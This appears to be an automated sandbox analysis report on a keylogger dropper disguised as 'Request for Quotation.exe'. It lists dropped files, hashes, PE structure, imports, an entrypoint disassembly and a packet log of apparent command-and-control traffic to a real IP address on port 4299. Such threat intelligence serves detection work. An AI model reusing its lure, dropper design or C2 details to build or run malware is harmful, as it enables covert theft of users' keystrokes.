                                                                              Preview: ........,...................$...............................................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\oqhczwm.b
                                                                              Process:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131072
                                                                              Entropy (8bit):7.998518254143225
                                                                              Encrypted:true
                                                                              SSDEEP:3072:Pc3XMkVOx0E/fhZA1lVN1189+pvOCrEfAWUWISphqya8DI:PcH9Oe2TA33k+B3rgUWISpmx
                                                                              MD5:E5F20C3168A73483F3A1619FB349F0D2
                                                                              SHA1:92F885A7E1F271335CC4231BF0D4E4F76EA34A62
                                                                              SHA-256:347D68209F4E393B9977D0C593727388C34EEE54787A3F77E7F13E39005B616C
                                                                              SHA-512:40E42444B382D6F666A8EFAE9EF6635E8E81DD1EEBAF27F4B0DB9C5675C837EAA50AE0B7105AC75103A719563ECA7FF267E3F23DAE0D960465EFC884DECDB10F
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview: .?E....o9.s.E....;.J..L6..S4. ..vp..;.0.....GR.:.tiU.k..i...~.....{..@.XE.....`.?U*{..-.N.......Zjpj.....- Z..tPm..zb...D.A../.%`..$(X#!{.S...E...-.........._..$....?..*.{ul.)..``.:...........p.....2..:S..l.$.....h...85.>"..+.n....E..:LG..a"..h..<...!q..........e"..mgP..?..{.....xr,......46.k..x....QE..kN.f...kA.;..b..r.P...y....><..k..#.H.7A.g. ]..k.5@..G...OJ..bk..qQk.....2..^.T=..jI...j..H.w1.(.<..R.v..{5.yl~.4o...9._~.P......)....0.ex...gx]x..s>........}...?._.....f...B}.@..K=...,.kF..CK....n.v.r)..z(o(G0...U..)Y...NE..M..c.....P........O..#.0ec..ODK...........d.t...0.A./-...T..f.s...*..^.....W..T....,?...WS..)..h.h..@|8><$....L?0L....h.(..\n...i.&.......p...,.$..e.....\......M...%....mXUz1d....<.....@......T....Y,d.-d.5.......#V...3.N.!....g.\..)f=.J.l..-...f.....-*..7..||...hPc3.R.b.xJ..X{g...cG..X.o..L7..X.F...r0......4.~x....c.je)OvSNGK...w|...#z.4......9.".9......JcP/.'S]...R..i........ro\..rh.+..A.,Sl......Nh#.$..h@3..4.c
                                                                              C:\Users\user\AppData\Roaming\excel\logs.dat
                                                                              Process:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):74
                                                                              Entropy (8bit):4.673971569609487
                                                                              Encrypted:false
                                                                              SSDEEP:3:ttUHS4fWT9t8rA4RXMRPHv31aeo:tmFfbXqdHv3IP
                                                                              MD5:0073BB44B36B49586AF77FC9862DC123
                                                                              SHA1:E58E4867FEE6C88C8D161AAE1250C01D4066EE95
                                                                              SHA-256:6CFC8BC39002CDFF5F6CD53EB3E783EC612D3548E37270C04A84132180C8A60C
                                                                              SHA-512:1BC4F93CB13F9C9345FEA4479490BF9DD9F0B629C86199D773F312927A909C3F4EA76B9A1CF39AFE349B456E8AFA35628351AC8D485D420E7365AFF1EA170C9B
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview: ..[2021/02/23 07:36:03 Offline Keylogger Started]....[ Program Manager ]..

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                              Entropy (8bit):7.415276485535663
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:Request for Quotation.exe
                                                                              File size:246893
                                                                              MD5:ae4bd6c5a7eaa50704d43d6054fc5dbd
                                                                              SHA1:ab597cfc0433999f2032c56fe2c9e17081bcab46
                                                                              SHA256:8e51354c8b2f461ab0cfb92409bc45bf4e06ae244080513e2d6224dc22f47771
                                                                              SHA512:b7b0b772a5e9e969f3d5389c1c12f053a5b3a7aa774fffa3a2dac8903df09a2a6b9d242a4f1fb63602d7581226ec647be44139d27aacd82dbec6242bcd3bab43
                                                                              SSDEEP:6144:M11Q0SiA9hfCmuW9e2TA3Hk+B3rUUWISpATi:ziIfCmuWE20kMUISpAO
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...L.......4............@

                                                                              File Icon

                                                                              Icon Hash:f0f06094c36ee8c2

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x403486
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                              Time Stamp:0x5F24D75F [Sat Aug 1 02:45:51 2020 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              sub esp, 00000184h
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              xor ebx, ebx
                                                                              push 00008001h
                                                                              mov dword ptr [esp+18h], ebx
                                                                              mov dword ptr [esp+10h], 0040A130h
                                                                              mov dword ptr [esp+20h], ebx
                                                                              mov byte ptr [esp+14h], 00000020h
                                                                              call dword ptr [004080B0h]
                                                                              call dword ptr [004080C0h]
                                                                              and eax, BFFFFFFFh
                                                                              cmp ax, 00000006h
                                                                              mov dword ptr [0042F44Ch], eax
                                                                              je 00007F0B98DA98F3h
                                                                              push ebx
                                                                              call 00007F0B98DACA6Eh
                                                                              cmp eax, ebx
                                                                              je 00007F0B98DA98E9h
                                                                              push 00000C00h
                                                                              call eax
                                                                              mov esi, 004082A0h
                                                                              push esi
                                                                              call 00007F0B98DAC9EAh
                                                                              push esi
                                                                              call dword ptr [004080B8h]
                                                                              lea esi, dword ptr [esi+eax+01h]
                                                                              cmp byte ptr [esi], bl
                                                                              jne 00007F0B98DA98CDh
                                                                              push 0000000Bh
                                                                              call 00007F0B98DACA42h
                                                                              push 00000009h
                                                                              call 00007F0B98DACA3Bh
                                                                              push 00000007h
                                                                              mov dword ptr [0042F444h], eax
                                                                              call 00007F0B98DACA2Fh
                                                                              cmp eax, ebx
                                                                              je 00007F0B98DA98F1h
                                                                              push 0000001Eh
                                                                              call eax
                                                                              test eax, eax
                                                                              je 00007F0B98DA98E9h
                                                                              or byte ptr [0042F44Fh], 00000040h
                                                                              push ebp
                                                                              call dword ptr [00408038h]
                                                                              push ebx
                                                                              call dword ptr [00408288h]
                                                                              mov dword ptr [0042F518h], eax
                                                                              push ebx
                                                                              lea eax, dword ptr [esp+38h]
                                                                              push 00000160h
                                                                              push eax
                                                                              push ebx
                                                                              push 00429878h
                                                                              call dword ptr [0040816Ch]
                                                                              push 0040A1ECh

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000xdc50.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x65ad0x6600False0.675628063725data6.48593060343IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x80000x13800x1400False0.4634765625data5.26110074066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xa0000x255580x600False0.470052083333data4.21916068772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                              .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x380000xdc500xde00False0.0953160191441data3.75209988336IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountry
                                                                              RT_ICON0x381d80xd228data
                                                                              RT_DIALOG0x454000x100dataEnglishUnited States
                                                                              RT_DIALOG0x455000x11cdataEnglishUnited States
                                                                              RT_DIALOG0x4561c0x60dataEnglishUnited States
                                                                              RT_GROUP_ICON0x4567c0x14data
                                                                              RT_VERSION0x456900x280dataEnglishUnited States
                                                                              RT_MANIFEST0x459100x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                              Imports

                                                                              DLLImport
                                                                              ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                              SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                              ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                              USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                              Version Infos

                                                                              DescriptionData
                                                                              LegalCopyrightCopyright adroit
                                                                              FileVersion83.34.3.56
                                                                              CompanyNameironing
                                                                              LegalTrademarksDagoman
                                                                              Commentsdiamond in the rough
                                                                              ProductNamesarita devi
                                                                              FileDescriptionmons pubis
                                                                              Translation0x0409 0x04e4

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States

                                                                              Network Behavior

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Feb 23, 2021 07:36:04.512733936 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:04.737149000 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:04.737268925 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:04.739273071 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:05.015842915 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:05.016155958 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:05.020406008 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:05.248426914 CET429949726103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:05.256908894 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:05.296231031 CET497264299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:05.512660980 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:05.513061047 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:05.513075113 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:05.784974098 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:05.785022020 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:05.785065889 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:05.785105944 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:05.785306931 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:05.785340071 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.035861015 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.035887957 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.035904884 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.035921097 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.035942078 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.035959959 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.035964966 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.035975933 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.035993099 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.036060095 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.282720089 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.282752037 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.282772064 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.282793045 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.282813072 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.282830000 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.282845020 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.282855034 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.282870054 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.282882929 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.282892942 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.282912970 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.282913923 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.282936096 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.282953024 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.282958031 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.282979012 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.283000946 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.283004045 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.283046007 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.519969940 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520035028 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520073891 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520106077 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520113945 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520152092 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520163059 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520189047 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520229101 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520251989 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520267963 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520314932 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520358086 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520363092 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520395994 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520405054 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520433903 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520473957 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520487070 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520514011 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520553112 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520579100 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520589113 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520632982 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520637035 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520678997 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520715952 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520726919 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520755053 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520792007 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520802975 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520828009 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520869017 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520874977 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520905972 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520953894 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.520961046 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.520996094 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.521034002 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.521044016 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.521074057 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.521131039 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763292074 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763318062 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763334990 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763353109 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763369083 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763390064 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763407946 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763416052 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763425112 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763442993 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763457060 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763459921 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763477087 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763480902 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763499975 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763503075 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763516903 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763533115 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763535976 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763550043 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763566971 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763587952 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763592005 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763607025 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763617039 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763624907 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763641119 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763658047 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763674021 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763674021 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763690948 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763690948 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763708115 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763709068 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763729095 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763748884 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763751984 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763766050 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763782024 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763789892 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763799906 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763817072 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763818979 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763834953 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763851881 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763860941 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763871908 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763890982 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763892889 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763906956 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763923883 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763941050 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763947010 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763957024 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763973951 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763976097 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.763989925 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.763995886 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.764010906 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764024973 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.764029026 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764045954 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764061928 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764079094 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764080048 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.764095068 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764110088 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.764111996 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764128923 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.764138937 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.764173985 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.999809027 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999871016 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999888897 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999903917 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999919891 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999936104 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999947071 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.999952078 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999968052 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:06.999969006 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.999979973 CET497284299192.168.2.4103.89.88.238
                                                                              Feb 23, 2021 07:36:06.999984026 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000004053 CET429949728103.89.88.238192.168.2.4
                                                                              Feb 23, 2021 07:36:07.000020981 CET497284299192.168.2.4103.89.88.238
